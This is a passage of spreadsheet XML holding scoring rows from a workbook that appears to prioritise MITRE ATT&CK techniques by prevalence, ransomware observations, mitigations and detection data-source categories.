      <c r="AU25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58" spans="1:47" ht="68">
      <c r="A258" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B258" s="37">
        <f t="shared" si="3"/>
        <v>106.54285714285714</v>
      </c>
      <c r="C258" s="37" t="s">
        <v>915</v>
      </c>
      <c r="D258" s="50" t="s">
        <v>916</v>
      </c>
      <c r="E258" s="37"/>
      <c r="F258" s="37">
        <v>1</v>
      </c>
      <c r="G258" s="37">
        <v>1</v>
      </c>
      <c r="H258" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I258" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J258" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K258" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L258" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M258" s="37">
        <v>0</v>
      </c>
      <c r="N258" s="56">
        <v>0</v>
      </c>
      <c r="O258" s="56">
        <v>1</v>
      </c>
      <c r="P258" s="56">
        <v>0</v>
      </c>
      <c r="Q258" s="56">
        <v>0</v>
      </c>
      <c r="R258" s="57"/>
      <c r="S258" s="57">
        <v>0</v>
      </c>
      <c r="T258" s="57"/>
      <c r="U258" s="57">
        <v>0</v>
      </c>
      <c r="V258" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W258" s="37">
        <v>0</v>
      </c>
      <c r="X258" s="37">
        <v>0</v>
      </c>
      <c r="Y258" s="37">
        <v>0</v>
      </c>
      <c r="Z258" s="37">
        <v>1</v>
      </c>
      <c r="AA258" s="37">
        <v>0.01</v>
      </c>
      <c r="AB258" s="37">
        <v>0.01</v>
      </c>
      <c r="AC258" s="37"/>
      <c r="AD258" s="50" t="s">
        <v>917</v>
      </c>
      <c r="AE258" s="37" t="str" cm="1">
        <f t="array" ref="AE258">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD258)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF258" s="37">
        <v>254</v>
      </c>
      <c r="AG258" s="37" t="str" cm="1">
        <f t="array" ref="AG258">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD258)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH258" s="37">
        <v>254</v>
      </c>
      <c r="AI258" s="37" t="str" cm="1">
        <f t="array" ref="AI258">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD258)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ258" s="37">
        <v>254</v>
      </c>
      <c r="AK258" s="37" t="str" cm="1">
        <f t="array" ref="AK258">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD258)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL258" s="37">
        <v>254</v>
      </c>
      <c r="AM258" s="37" t="str" cm="1">
        <f t="array" ref="AM258">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD258)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN258" s="37">
        <v>0</v>
      </c>
      <c r="AO258" s="37">
        <v>0</v>
      </c>
      <c r="AP258" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ258" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.514285714285712</v>
      </c>
      <c r="AR258" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS258" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT258" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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59" spans="1:47" ht="34">
      <c r="A259" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B259" s="37">
        <f t="shared" si="3"/>
        <v>746.30238095238099</v>
      </c>
      <c r="C259" s="37" t="s">
        <v>918</v>
      </c>
      <c r="D259" s="50" t="s">
        <v>919</v>
      </c>
      <c r="E259" s="37"/>
      <c r="F259" s="37">
        <v>2</v>
      </c>
      <c r="G259" s="37">
        <v>1</v>
      </c>
      <c r="H259" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I259" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J259" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K259" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L259" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M259" s="37">
        <v>0</v>
      </c>
      <c r="N259" s="56">
        <v>0</v>
      </c>
      <c r="O259" s="56">
        <v>8</v>
      </c>
      <c r="P259" s="56">
        <v>1</v>
      </c>
      <c r="Q259" s="56">
        <v>3</v>
      </c>
      <c r="R259" s="57" t="s">
        <v>920</v>
      </c>
      <c r="S259" s="57">
        <v>28</v>
      </c>
      <c r="T259" s="57" t="s">
        <v>921</v>
      </c>
      <c r="U259" s="57">
        <v>32</v>
      </c>
      <c r="V259" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.580952380952381</v>
      </c>
      <c r="W259" s="37">
        <v>60</v>
      </c>
      <c r="X259" s="37">
        <v>1.0909089999999999</v>
      </c>
      <c r="Y259" s="37">
        <v>1</v>
      </c>
      <c r="Z259" s="37">
        <v>12</v>
      </c>
      <c r="AA259" s="37">
        <v>0.12</v>
      </c>
      <c r="AB259" s="37">
        <v>0.12</v>
      </c>
      <c r="AC259" s="37"/>
      <c r="AD259" s="50" t="s">
        <v>847</v>
      </c>
      <c r="AE259" s="37" t="str" cm="1">
        <f t="array" ref="AE259">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD259)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF259" s="37">
        <v>255</v>
      </c>
      <c r="AG259" s="37" t="str" cm="1">
        <f t="array" ref="AG259">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD259)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH259" s="37">
        <v>255</v>
      </c>
      <c r="AI259" s="37" t="str" cm="1">
        <f t="array" ref="AI259">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD259)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ259" s="37">
        <v>255</v>
      </c>
      <c r="AK259" s="37" t="str" cm="1">
        <f t="array" ref="AK259">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD259)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL259" s="37">
        <v>255</v>
      </c>
      <c r="AM259" s="37" t="str" cm="1">
        <f t="array" ref="AM259">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD259)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN259" s="37">
        <v>0</v>
      </c>
      <c r="AO259" s="37">
        <v>2</v>
      </c>
      <c r="AP259" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ259" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>248.76746031746032</v>
      </c>
      <c r="AR259" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS259" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT259" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU25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11.89368858654573</v>
      </c>
    </row>
    <row r="260" spans="1:47" ht="34">
      <c r="A260" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B260" s="37">
        <f t="shared" si="3"/>
        <v>452.78608690476193</v>
      </c>
      <c r="C260" s="37" t="s">
        <v>922</v>
      </c>
      <c r="D260" s="50" t="s">
        <v>923</v>
      </c>
      <c r="E260" s="37"/>
      <c r="F260" s="37">
        <v>1</v>
      </c>
      <c r="G260" s="37">
        <v>1</v>
      </c>
      <c r="H260" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I260" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J260" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K260" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L260" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M260" s="37">
        <v>2.7456999999999999E-2</v>
      </c>
      <c r="N260" s="56">
        <v>0</v>
      </c>
      <c r="O260" s="56">
        <v>3</v>
      </c>
      <c r="P260" s="56">
        <v>1</v>
      </c>
      <c r="Q260" s="56">
        <v>0</v>
      </c>
      <c r="R260" s="57" t="s">
        <v>475</v>
      </c>
      <c r="S260" s="57">
        <v>8</v>
      </c>
      <c r="T260" s="57" t="s">
        <v>924</v>
      </c>
      <c r="U260" s="57">
        <v>23</v>
      </c>
      <c r="V260" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.31428552380952385</v>
      </c>
      <c r="W260" s="37">
        <v>31</v>
      </c>
      <c r="X260" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Y260" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Z260" s="37">
        <v>4</v>
      </c>
      <c r="AA260" s="37">
        <v>0.04</v>
      </c>
      <c r="AB260" s="37">
        <v>0.04</v>
      </c>
      <c r="AC260" s="37"/>
      <c r="AD260" s="50" t="s">
        <v>541</v>
      </c>
      <c r="AE260" s="37" t="str" cm="1">
        <f t="array" ref="AE260">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD260)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF260" s="37">
        <v>256</v>
      </c>
      <c r="AG260" s="37" t="str" cm="1">
        <f t="array" ref="AG260">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD260)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH260" s="37">
        <v>256</v>
      </c>
      <c r="AI260" s="37" t="str" cm="1">
        <f t="array" ref="AI260">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD260)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ260" s="37">
        <v>256</v>
      </c>
      <c r="AK260" s="37" t="str" cm="1">
        <f t="array" ref="AK260">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD260)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL260" s="37">
        <v>256</v>
      </c>
      <c r="AM260" s="37" t="str" cm="1">
        <f t="array" ref="AM260">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD260)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN260" s="37">
        <v>0</v>
      </c>
      <c r="AO260" s="37">
        <v>3</v>
      </c>
      <c r="AP260" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ260" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>150.92869563492064</v>
      </c>
      <c r="AR260" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS260" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT260" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU26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10.852049688208616</v>
      </c>
    </row>
    <row r="261" spans="1:47" ht="51">
      <c r="A261" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B261" s="37">
        <f t="shared" ref="B261:B324" si="4">SUM(H261,M261,V261)*(1+SUM(AF261,AH261,AJ261,AL261,AN261))</f>
        <v>470.399902</v>
      </c>
      <c r="C261" s="37" t="s">
        <v>925</v>
      </c>
      <c r="D261" s="50" t="s">
        <v>926</v>
      </c>
      <c r="E261" s="37"/>
      <c r="F261" s="37">
        <v>1</v>
      </c>
      <c r="G261" s="37">
        <v>1</v>
      </c>
      <c r="H261" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I261" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J261" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K261" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L261" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M261" s="37">
        <v>0</v>
      </c>
      <c r="N261" s="56">
        <v>0</v>
      </c>
      <c r="O261" s="56">
        <v>8</v>
      </c>
      <c r="P261" s="56">
        <v>1</v>
      </c>
      <c r="Q261" s="56">
        <v>2</v>
      </c>
      <c r="R261" s="57" t="s">
        <v>475</v>
      </c>
      <c r="S261" s="57">
        <v>8</v>
      </c>
      <c r="T261" s="57" t="s">
        <v>927</v>
      </c>
      <c r="U261" s="57">
        <v>24</v>
      </c>
      <c r="V261" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.35714276190476185</v>
      </c>
      <c r="W261" s="37">
        <v>32</v>
      </c>
      <c r="X261" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y261" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z261" s="37">
        <v>11</v>
      </c>
      <c r="AA261" s="37">
        <v>0.11</v>
      </c>
      <c r="AB261" s="37">
        <v>0.11</v>
      </c>
      <c r="AC261" s="37"/>
      <c r="AD261" s="50" t="s">
        <v>928</v>
      </c>
      <c r="AE261" s="37" t="str" cm="1">
        <f t="array" ref="AE261">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD261)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF261" s="37">
        <v>257</v>
      </c>
      <c r="AG261" s="37" t="str" cm="1">
        <f t="array" ref="AG261">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD261)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH261" s="37">
        <v>257</v>
      </c>
      <c r="AI261" s="37" t="str" cm="1">
        <f t="array" ref="AI261">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD261)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ261" s="37">
        <v>257</v>
      </c>
      <c r="AK261" s="37" t="str" cm="1">
        <f t="array" ref="AK261">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD261)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL261" s="37">
        <v>257</v>
      </c>
      <c r="AM261" s="37" t="str" cm="1">
        <f t="array" ref="AM261">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD261)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN261" s="37">
        <v>0</v>
      </c>
      <c r="AO261" s="37">
        <v>4</v>
      </c>
      <c r="AP261" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ261" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>156.79996733333334</v>
      </c>
      <c r="AR261" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS261" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT261" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU26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15.028568317460318</v>
      </c>
    </row>
    <row r="262" spans="1:47" ht="34">
      <c r="A262" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B262" s="37">
        <f t="shared" si="4"/>
        <v>491.90481109523813</v>
      </c>
      <c r="C262" s="37" t="s">
        <v>929</v>
      </c>
      <c r="D262" s="50" t="s">
        <v>930</v>
      </c>
      <c r="E262" s="37"/>
      <c r="F262" s="37">
        <v>1</v>
      </c>
      <c r="G262" s="37">
        <v>1</v>
      </c>
      <c r="H262" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I262" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J262" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K262" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L262" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M262" s="37">
        <v>0</v>
      </c>
      <c r="N262" s="56">
        <v>0</v>
      </c>
      <c r="O262" s="56">
        <v>0</v>
      </c>
      <c r="P262" s="56">
        <v>0</v>
      </c>
      <c r="Q262" s="56">
        <v>1</v>
      </c>
      <c r="R262" s="57" t="s">
        <v>931</v>
      </c>
      <c r="S262" s="57">
        <v>15</v>
      </c>
      <c r="T262" s="57" t="s">
        <v>932</v>
      </c>
      <c r="U262" s="57">
        <v>24</v>
      </c>
      <c r="V262" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.37619052380952384</v>
      </c>
      <c r="W262" s="37">
        <v>39</v>
      </c>
      <c r="X262" s="37">
        <v>0.70909100000000003</v>
      </c>
      <c r="Y262" s="37">
        <v>0.70909100000000003</v>
      </c>
      <c r="Z262" s="37">
        <v>1</v>
      </c>
      <c r="AA262" s="37">
        <v>0.01</v>
      </c>
      <c r="AB262" s="37">
        <v>0.01</v>
      </c>
      <c r="AC262" s="37"/>
      <c r="AD262" s="50" t="s">
        <v>933</v>
      </c>
      <c r="AE262" s="37" t="str" cm="1">
        <f t="array" ref="AE262">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD262)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF262" s="37">
        <v>258</v>
      </c>
      <c r="AG262" s="37" t="str" cm="1">
        <f t="array" ref="AG262">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD262)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH262" s="37">
        <v>258</v>
      </c>
      <c r="AI262" s="37" t="str" cm="1">
        <f t="array" ref="AI262">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD262)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ262" s="37">
        <v>258</v>
      </c>
      <c r="AK262" s="37" t="str" cm="1">
        <f t="array" ref="AK262">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD262)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL262" s="37">
        <v>258</v>
      </c>
      <c r="AM262" s="37" t="str" cm="1">
        <f t="array" ref="AM262">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD262)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN262" s="37">
        <v>0</v>
      </c>
      <c r="AO262" s="37">
        <v>0</v>
      </c>
      <c r="AP262" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ262" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>163.96827036507938</v>
      </c>
      <c r="AR262" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS262" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT262" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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63" spans="1:47" ht="34">
      <c r="A263" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B263" s="37">
        <f t="shared" si="4"/>
        <v>488.87147795238104</v>
      </c>
      <c r="C263" s="37" t="s">
        <v>934</v>
      </c>
      <c r="D263" s="50" t="s">
        <v>930</v>
      </c>
      <c r="E263" s="37" t="s">
        <v>935</v>
      </c>
      <c r="F263" s="37">
        <v>1</v>
      </c>
      <c r="G263" s="37">
        <v>1</v>
      </c>
      <c r="H263" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I263" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J263" s="37">
